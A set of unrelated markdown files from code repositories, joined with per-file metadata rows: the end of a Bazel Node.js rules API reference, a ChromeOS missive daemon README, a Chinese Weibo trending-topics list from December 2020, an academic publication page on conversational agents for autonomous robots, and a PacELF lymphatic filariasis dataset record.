Defaults to `{"1.12.1": ("yarn-v1.12.1.tar.gz", "yarn-v1.12.1", "09bea8f4ec41e9079fa03093d3b2db7ac5c5331852236d63815f8df42b3ba88d"), "1.12.3": ("yarn-v1.12.3.tar.gz", "yarn-v1.12.3", "02cd4b589ec22c4bdbd2bc5ebbfd99c5e99b07242ad68a539cb37896b93a24f2"), "1.13.0": ("yarn-v1.13.0.tar.gz", "yarn-v1.13.0", "125d40ebf621ebb08e3f66a618bd2cc5cd77fa317a312900a1ab4360ed38bf14"), "1.3.2": ("yarn-v1.3.2.tar.gz", "yarn-v1.3.2", "6cfe82e530ef0837212f13e45c1565ba53f5199eec2527b85ecbcd88bf26821d"), "1.5.1": ("yarn-v1.5.1.tar.gz", "yarn-v1.5.1", "cd31657232cf48d57fdbff55f38bfa058d2fb4950450bd34af72dac796af4de1"), "1.6.0": ("yarn-v1.6.0.tar.gz", "yarn-v1.6.0", "a57b2fdb2bfeeb083d45a883bc29af94d5e83a21c25f3fc001c295938e988509"), "1.9.2": ("yarn-v1.9.2.tar.gz", "yarn-v1.9.2", "3ad69cc7f68159a562c676e21998eb21b44138cae7e8fe0749a7d620cf940204"), "1.9.4": ("yarn-v1.9.4.tar.gz", "yarn-v1.9.4", "7667eb715077b4bad8e2a832e7084e0e6f1ba54d7280dc573c8f7031a7fb093e")}`
#### `node_urls`
optional; custom list of URLs to use to download NodeJS.
Defaults to `["https://mirror.bazel.build/nodejs.org/dist/v{version}/{filename}", "https://nodejs.org/dist/v{version}/{filename}"]`
#### `yarn_urls`
optional; custom list of URLs to use to download Yarn.
Defaults to `["https://mirror.bazel.build/github.com/yarnpkg/yarn/releases/download/v{version}/{filename}", "https://github.com/yarnpkg/yarn/releases/download/v{version}/{filename}"]`
#### `preserve_symlinks`
Turn on --node_options=--preserve-symlinks for nodejs_binary and nodejs_test rules.
The default for this is currently True but the options is deprecated and will be removed in the future.
When this option is turned on, node will preserve the symlinked path for resolves instead of the default
behavior of resolving to the real path. This means that all required files must be in be included in your
runfiles as it prevents the default behavior of potentially resolving outside of the runfiles. For example,
all required files need to be included in your node_modules filegroup. This option is desirable as it gives
a stronger guarantee of hermiticity which is required for remote execution.
Defaults to `True`
## nodejs_binary
This macro exists only to wrap the nodejs_binary as an .exe for Windows.
This is exposed in the public API at `//:defs.bzl` as `nodejs_binary`, so most
users loading `nodejs_binary` are actually executing this macro.
### Usage
```
nodejs_binary(name, data, args, visibility, tags, testonly, kwargs)
```
#### `name`
name of the label
#### `data`
runtime dependencies
Defaults to `[]`
#### `args`
applied to the wrapper binary
Defaults to `[]`
#### `visibility`
applied to the wrapper binary
Defaults to `None`
#### `tags`
applied to the wrapper binary
Defaults to `[]`
#### `testonly`
applied to nodejs_binary and wrapper binary
Defaults to `0`
#### `kwargs`
passed to the nodejs_binary
## nodejs_test
This macro exists only to wrap the nodejs_test as an .exe for Windows.
This is exposed in the public API at `//:defs.bzl` as `nodejs_test`, so most
users loading `nodejs_test` are actually executing this macro.
### Usage
```
nodejs_test(name, data, args, visibility, tags, kwargs)
```
#### `name`
name of the label
#### `data`
runtime dependencies
Defaults to `[]`
#### `args`
applied to the wrapper binary
Defaults to `[]`
#### `visibility`
applied to the wrapper binary
Defaults to `None`
#### `tags`
applied to the wrapper binary
Defaults to `[]`
#### `kwargs`
passed to the nodejs_test
## npm_install
### Usage
```
npm_install(kwargs)
```
#### `kwargs`
## yarn_install
### Usage
```
yarn_install(kwargs)
```
#### `kwargs`
| 27.620455 | 4,091 | 0.702707 | eng_Latn | 0.930044 |
875029552ebbb637e769c788be77309c61283b8e | 2,178 | md | Markdown | missive/README.md | Toromino/chromiumos-platform2 | 97e6ba18f0e5ab6723f3448a66f82c1a07538d87 | [
"BSD-3-Clause"
] | null | null | null | missive/README.md | Toromino/chromiumos-platform2 | 97e6ba18f0e5ab6723f3448a66f82c1a07538d87 | [
"BSD-3-Clause"
] | null | null | null | missive/README.md | Toromino/chromiumos-platform2 | 97e6ba18f0e5ab6723f3448a66f82c1a07538d87 | [
"BSD-3-Clause"
] | null | null | null | # Missive Daemon
The Missive Daemon encrypts, stores, and forwards reporting records enqueued on
its DBus interface. The interface allows other CrOS daemons and Chrome to
enqueue records which are then encrypted and stored on disk. Records are
enqueued in different priority queues, which have different upload periods.
Once the storage daemon determines that a queue is ready for upload (i.e. the
requisite period has elapsed), it sends records to Chrome to be uploaded to
the Reporting Server. On successful upload, records are deleted from disk.
Note: This is a complementary daemon to the
`//chrome/browser/policy/messaging_layer` package in chromium.
## Build and Deploy
```
# HOST (inside chroot)
~$ cros-workon-${BOARD} start missive
~$ emerge-${BOARD} missive
~$ cros deploy ssh://localhost:9222 missive
# DUT
~# start missived
```
## Original design docs
Note that aspects of the design may have evolved since the original design docs
were written.
* [Daemon Design](go/cros-reporting-daemon)
* [Messaging Layer](go/chrome-reporting-messaging-layer)
## Updating From Chromium
### General Guidelines
The code in the following folders originally comes from
chromium://components/reporting:
- compression
- encryption
- proto
- storage
- util
When importing updates from the chromium code you will encounter the following
issues:
1. #include statements in chromium for //base need to be converted as follows:
#include "base/example.h" -> #include <base/example.h>
2. Protobuf include directory can be converted from chromium as follows:
"third_party/protobuf/src/google/protobuf/..." -> <google/protobuf/...>
3. ChromeOS doesn't need to worry about worrying on multiple operating systems,
so doesn't require FILE_PATH_LITERAL, base::FilePath::CharType, or
base::FilePath::StringType. It can be assumed that these are simple char or
std::strings.
4. base::DoNothing() comes from <base/bind_helpers.h> rather than
"base/callback_helpers.h"
### Specific Files
- chromium://components/reporting/util/status.proto has been moved to
.../missive/proto/status.proto. This is due to difficulties in including
protos within protos on ChromeOS.
| 33 | 79 | 0.769054 | eng_Latn | 0.994849 |
875162827487671b9f66454bb0927bbc4b403f03 | 1,909 | md | Markdown | README.md | fxnolimit/FrancoisMukabaCS300_5 | 6853fa72e656b9d706d4d75987ee98606ac44723 | [
"MIT"
] | 1 | 2019-07-24T02:34:52.000Z | 2019-07-24T02:34:52.000Z | README.md | fxnolimit/BarcodeScanner | 6853fa72e656b9d706d4d75987ee98606ac44723 | [
"MIT"
] | null | null | null | README.md | fxnolimit/BarcodeScanner | 6853fa72e656b9d706d4d75987ee98606ac44723 | [
"MIT"
] | null | null | null | - In this assignment, you are asked to design and develop a C++ program that allow users to quickly look up items by their UPC Code. The Universal Product Code (UPC) is a barcode symbology that is widely used in the United States, Canada, United Kingdom, Australia, New Zealand, in Europe and other countries for tracking trade items in stores. UPC consists of numeric digits, that are uniquely assigned to each trade item. You can think that your application could be running on a device connected to bar code scanner or behind a web or mobile application that reads UPC codes as user input. You are provided with a large dataset of UPC codes (more than 1billion) for all kinds of things. Requirements:
- Provide implementation for Binary Search Tree header file
- Write a barcode scanner client program that reads in the provided data file into a binary search tree object, use UPC code as the key and name your program as BarcodeBSTScanner.cpp. For simplicity, you can just read the UPC code (the number that appears before the first comma) into one field (use the UPC code as the “key”) and then read the remaining info into a single string (the “value” associated with the key). You may assume that there will be no duplicate keys in data sets.
- Write a separate barcode scanner client program that uses arrays instead of binary search tree (BarcodeArrayScanner.cpp)
- Perform several experiments on various data set sizes to examine the performance of search operation in both binary search tree-based and array-based solutions. Keep timing for experiments and draw a graph to compare the results of the performances of both implementations.
- Sample Run-1:
UPC Code: 52569735756 FOXMEYER CORP. PAIN RELIEF BST time: 17 miliseconds Array time: 21653 miliseconds
- Sample Run-2: UPC Code: 7
01197247482 Wiuep Co 200mL Wiuep Denim Mist 200mL BST time: 10 miliseconds Array time: 7 miliseconds
| 159.083333 | 704 | 0.795705 | eng_Latn | 0.998851 |
8751747ce78cc37271641ac58a66d37b6e38423c | 1,464 | md | Markdown | 2020/12/25/2020-12-25 16:35.md | zhzhzhy/WeiBoHot_history | 32ce4800e63f26384abb17d43e308452c537c902 | [
"MIT"
] | 3 | 2020-07-14T14:54:15.000Z | 2020-08-21T06:48:24.000Z | 2020/12/25/2020-12-25 16:35.md | zhzhzhy/WeiBoHot_history | 32ce4800e63f26384abb17d43e308452c537c902 | [
"MIT"
] | null | null | null | 2020/12/25/2020-12-25 16:35.md | zhzhzhy/WeiBoHot_history | 32ce4800e63f26384abb17d43e308452c537c902 | [
"MIT"
] | null | null | null | 2020年12月25日16时数据
Status: 200
1.微信支付宝将进行适老化改造
微博热度:2170550
2.香港禁止来自南非人士登机抵港
微博热度:1416982
3.只产100天的牛奶
微博热度:1416244
4.胡杏儿说没必要放大女演员怀孕这件事
微博热度:1413463
5.焦恩俊吐槽自己早期造型
微博热度:1197973
6.爱心接力 由你续写
微博热度:1168666
7.唐太宗和隋文帝的行宫新发现
微博热度:1106387
8.日本学校公开检查学生内衣
微博热度:1099188
9.陈伟霆镜片掉了一天没发现
微博热度:990830
10.晴雅集
微博热度:968843
11.王祖蓝二胎女儿正面照
微博热度:958169
12.阿娇经纪公司回应拒上浪姐2
微博热度:920442
13.周杰伦晒豪车圣诞礼物
微博热度:903373
14.美国将要求英国入境旅客持新冠阴性证明
微博热度:706287
15.新加坡发现首例变异病毒感染病例
微博热度:700099
16.郑秀晶郑秀妍圣诞合照
微博热度:698423
17.女神降临 社死现场
微博热度:554439
18.孙坚从有翡全世界路过
微博热度:551662
19.王牌部队预告
微博热度:548668
20.考研酒店房价格暴涨10倍
微博热度:545741
21.向华强申请居留台湾
微博热度:543403
22.香港水域再现粉红海豚
微博热度:475183
23.昆明游客嘴叼面包喂红嘴鸥
微博热度:424475
24.2020电视剧十大之最
微博热度:393097
25.发带也太挑人了吧
微博热度:378660
26.喻言rap
微博热度:376488
27.萧亚轩 赤裸真相
微博热度:355142
28.邓伦说选择工作不是完成KPI
微博热度:348021
29.哈登有意加盟绿军开拓者
微博热度:345632
30.中国维和部队首次受领核酸检测任务
微博热度:344712
31.胡杏儿怀三胎
微博热度:344564
32.适合情侣跨年的浪漫圣地
微博热度:298038
33.送你一朵小红花预售破8000万
微博热度:294374
34.圆明园首次修复琉璃构件
微博热度:288590
35.国家卫健委派出工作组赶赴大连
微博热度:280114
36.美团买菜回应无症状感染者曾网购食材
微博热度:279001
37.圣诞老人骑电车送礼物违章被查
微博热度:270028
38.圣诞文案
微博热度:253978
39.安崎Yea
微博热度:244588
40.圣诞节
微博热度:242726
41.我国首座公铁两用跨海大桥将投入使用
微博热度:242642
42.王一博黑白氛围感大片
微博热度:242589
43.关押李明博看守所疫情恶化
微博热度:240350
44.明侦 封神
微博热度:231483
45.被一只长颈鹿惊艳到了
微博热度:226542
46.满洲里本土确诊病例全部治愈出院
微博热度:211161
47.圣诞苹果爆汁烤鸡
微博热度:211025
48.雷佳音想黄渤找灵感
微博热度:210989
49.减少两节期间人员流动和聚集
微博热度:188115
50.往后余生开机
微博热度:162344
| 7.176471 | 21 | 0.788934 | yue_Hant | 0.438571 |
8751801bbc64ce9814cfd522a9970438dd7abb74 | 1,721 | md | Markdown | _publications/dis2019.md | jonatansw/jonatansw.github.io | cf3dc63a4d8040e39d3fc0617638c5612c500bb9 | [
"MIT"
] | null | null | null | _publications/dis2019.md | jonatansw/jonatansw.github.io | cf3dc63a4d8040e39d3fc0617638c5612c500bb9 | [
"MIT"
] | null | null | null | _publications/dis2019.md | jonatansw/jonatansw.github.io | cf3dc63a4d8040e39d3fc0617638c5612c500bb9 | [
"MIT"
] | null | null | null | ---
title: "Exploring interaction with remote autonomous systems using conversational agents"
collection: publications
permalink: dis2019
excerpt: ''
date: 2019-01-01
venue: 'Proceedings of the 2019 ACM Designing Interactive Systems Conference'
paperurl: 'https://dl.acm.org/doi/10.1145/3322276.3322318'
citation: 'Robb, D. A., Lopes, J., Padilla, S., Laskov, A., Chiyah Garcia, F. J., Liu, X., Willners, J. S., Valeyrie, N., Lohan, K., Lane, D., Patron, P., Petillot, Y., Chantler, M. J., & Hastie, H. (2019). Exploring interaction with remote autonomous systems using conversational agents. DIS 2019 - Proceedings of the 2019 ACM Designing Interactive Systems Conference, 1543–1556. https://doi.org/10.1145/3322276.3322318'
---
Autonomous vehicles and robots are increasingly being deployed to remote, dangerous environments in the energy sector, search and rescue and the military. As a result, there is a need for humans to interact with these robots to monitor their tasks, such as inspecting and repairing offshore wind-turbines. Conversational Agents can improve situation awareness and transparency, while being a hands-free medium to communicate key information quickly and succinctly. As part of our user-centered design of such systems, we conducted an in-depth immersive qualitative study of twelve marine research scientists and engineers, interacting with a prototype Conversational Agent. Our results expose insights into the appropriate content and style for the natural language interaction and, from this study, we derive nine design recommendations to inform future Conversational Agent design for remote autonomous systems.
[Download paper here](http://jonatansw.github.io/files/papers/dis2019.pdf)
| 114.733333 | 913 | 0.793725 | eng_Latn | 0.976714 |
8751b3adcbbc61e21105d48afc717293334cb1bd | 1,645 | md | Markdown | _datasets/Multicountry_PacificIchimori_et_al_2007_TIP_LF_Pacfic.md | pacelf/pacelf | cd9f3608843eaf7d9dff6e20e06ee4bf773467e3 | [
"MIT"
] | null | null | null | _datasets/Multicountry_PacificIchimori_et_al_2007_TIP_LF_Pacfic.md | pacelf/pacelf | cd9f3608843eaf7d9dff6e20e06ee4bf773467e3 | [
"MIT"
] | 2 | 2021-10-06T01:58:48.000Z | 2022-02-18T04:52:34.000Z | _datasets/Multicountry_PacificIchimori_et_al_2007_TIP_LF_Pacfic.md | pacelf/pacelf | cd9f3608843eaf7d9dff6e20e06ee4bf773467e3 | [
"MIT"
] | null | null | null | ---
schema: pacelf
title: Lymphatic filariasis elimination in the Pacific PacELF replicating Japanese success
organization: Ichimori, K., Graves, P.M., Crump, A.
notes: Japan successfully eliminated lymphatic filariasis and other parasitic diseases through community-driven, integrated nationwide campaigns undertaken during the 1960s and 1970s. The campaigns also created a cadre of experienced clinicians, scientists and public health workers with excellent technical and operational knowledge and a positive attitude towards filariasis elimination. These factors, and the humanitarian desire to improve health in neighbouring nations, influenced Japan to support filariasis control efforts overseas, starting in the 1970s and continuing through to the inception of the Pacific Programme to Eliminate Lymphatic Filariasis (PacELF) in 1999. The unique community-driven, self-help approach of Japan to disease control and health improvement profoundly influenced the activities of PacELF. PacELF is demonstrating that the successful national disease-elimination model in Japan can be extended to the regional level.
access: Restricted
resources:
- name: Lymphatic filariasis elimination in the Pacific PacELF replicating Japanese success
url: '/docs/Multicountry_PacificIchimori_et_al_2007_TIP_LF_Pacfic.txt'
format: Electronic/Hardcopy
access: Restricted
pages: 36-40
category: Scientific Papers
access: Restricted
journal: Trends in Parasitology
publisher: No publisher available.
language: English
tags: English
hardcopy_location: JCU WHOCC; FIJI
work_location: Multicountry Pacific
year: 2007
decade: 2000
PacELF_ID: 711
---
| 60.925926 | 953 | 0.829179 | eng_Latn | 0.993612 |